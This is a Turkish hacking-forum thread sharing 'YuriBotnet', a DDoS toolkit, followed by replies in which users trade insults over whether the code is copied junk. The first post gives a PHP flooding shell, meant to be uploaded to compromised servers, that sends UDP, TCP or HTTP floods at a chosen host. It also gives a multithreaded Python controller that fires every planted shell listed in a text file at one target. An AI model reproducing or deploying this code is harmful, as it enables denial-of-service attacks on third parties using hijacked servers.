Python YuriBotnet Bot (2 Viewers)

Joined
Nov 10, 2018
Credits
0
Rating - 0%
Bot multithreadtir. TCP - UDP - HTTP attack ozelligi mevcuttur.

Girdiginiz sunuculara su shelli uploadlayacaksiniz.

yuri.php ;

View hidden content is available for registered users!

PHP:
<?php

/*

* Coded by Yuri Matyev ~ Isko
* since 2011 ~ ?
* imhatimi.org / spyhackerz.com

*/
if (!empty($_GET['type'])) {
    if ($_GET['type']=='udp') {
        if (isset($_GET['host']) && isset($_GET['time'])) {
            ignore_user_abort(TRUE);
            set_time_limit(0);

            $exec_time = $_GET['time'];
            $time = time();
            $max_time = $time + $exec_time;
            $host = $_GET['host'];
            $out = '';

            for ($i = 0; $i < 65000; $i++) {
                $out .= 'X';
            }
            while (1) {
                if (time() > $max_time) {
                    break;
                }
                $rand = rand(1, 65000);
                $fp = fsockopen('udp://' . $host, $rand, $errno, $errstr, 5);
                if ($fp) {
                    @fwrite($fp, $out);
                    fclose($fp);
                }
            }

        }
        exit();
    }
    if ($_GET['type']=='tcp') {
        if (isset($_GET['host']) && isset($_GET['time'])) {
            ignore_user_abort(FALSE);
            set_time_limit(0);

            $exec_time = $_GET['time'];
            $time = time();
            $max_time = $time + $exec_time;

            $host = $_GET['host'];
            $port = $_GET['port'];
            $out = '';

            for ($i = 0; $i < 65000; $i++) {
                $out .= 'X';
            }
            while (1) {
                if (time() > $max_time) {
                    break;
                }
                $fp = fsockopen('tcp://' . $host, $port, $errno, $errstr, 5);
                if ($fp) {
                    @fwrite($fp, $out);
                    fclose($fp);
                }
            }

        }
        exit();
    }
    if ($_GET['type']=='http') {
        if (isset($_GET['host']) && isset($_GET['time']) && isset($_GET['port']) && isset($_GET['page'])) {
            set_time_limit(0);
            ignore_user_abort(FALSE);
            $page = $_GET['page'];
            $host = $_GET['host'] . $page;
            $port = $_GET['port'];
            $exec_time = $_GET['time'];
            $time = time();
            $max_time = $time+$exec_time;
            $out = '';

            for ($i = 0; $i < 65000; $i++) {
                $out .= 'X';
            }
            while(1){
                if(time() > $max_time){
                    break;
                }
                $fp = fsockopen($host, $port, $errno, $errstr, 30);
                if (!$fp) {
                    @fwrite($fp, $out);
                    fclose($fp);
                }
            }

        }
        exit();
    }
}



bulundugunuz dizine ww.txt diye bir metin belgesi acip sunuculara yuklediginiz shelleri txt ye satir satir yapistirin ve asagidaki bot ile topluca yardirin :)

yuri_killer.py

View hidden content is available for registered users!

Code:
#!/usr/bin/env python3
from threading import Thread
import requests

print("TCP - UDP - HTTP Attack Bot..")
print("Coded by Yuri Matyev & init1ove")


def multi(shell_yolu, host, port, saldiri_tipi, zaman):

    if str(shell_yolu).endswith("\n"):
        shell_yolu = shell_yolu[:-1]
    else:
        pass

    hazir_hedef = str(shell_yolu) + "?type=" + str(saldiri_tipi) +"&host="+ str(host) +"&port="+ str(port) +"&time=" + str(zaman)
    
    print(hazir_hedef)
    try:
        r = requests.get(hazir_hedef)
        print(r.status_code)
    except:
        print(r.status_code)


def actions():
    global urls
    global input_host
    global input_port
    global input_saldiri_tipi
    global input_saldiri_suresi
    urls= []
    with open("ww.txt", "r+") as dosya:
        try:
            urls += dosya.readlines()
        except:
            pass

    istenen_url_sayisi = int(input('Kac Site İle Saldirilsin ? : '))
    urls = urls[:istenen_url_sayisi]
    input_host = str(input("Hedef   : "))
    input_port = str(input("Port    : "))
    input_saldiri_tipi = str(input("Saldiri Tipi ( tcp - udp - http) : "))
    input_saldiri_suresi = str(input("Saldiri Suresi: "))

actions()

for i in range(len(urls)):
    t = Thread(target=multi, args=(urls[i], input_host, input_port, input_saldiri_tipi, input_saldiri_suresi))
    t.start()


cok istek olursa proxyli versiyonunu da yayinlarim . iyi forumlar ;)
 
Joined
May 18, 2017
Credits
0
Rating - 0%
:) beceremediğin işe çöp demek yeni moda herhalde?
beceremediğim içinmi dfsdkfdslfklsdkf ah be kardeşim kaç senedir. bu işteyim. böyle saçma sapan sağdan soldan alıntı kodlar ile yapılmış sc görmedim.
Tüm forum salak olduğundan dolayı çöpe yorum atıyor zaten. Bi akıllı sensin.
sen nasıl bi sığırsın?
olum az ne var kodlarda bak bakayım ? sağdan sonldan alıntı kodlar.. gerkesiz ve çöptür.
 

Users who are viewing this thread

Top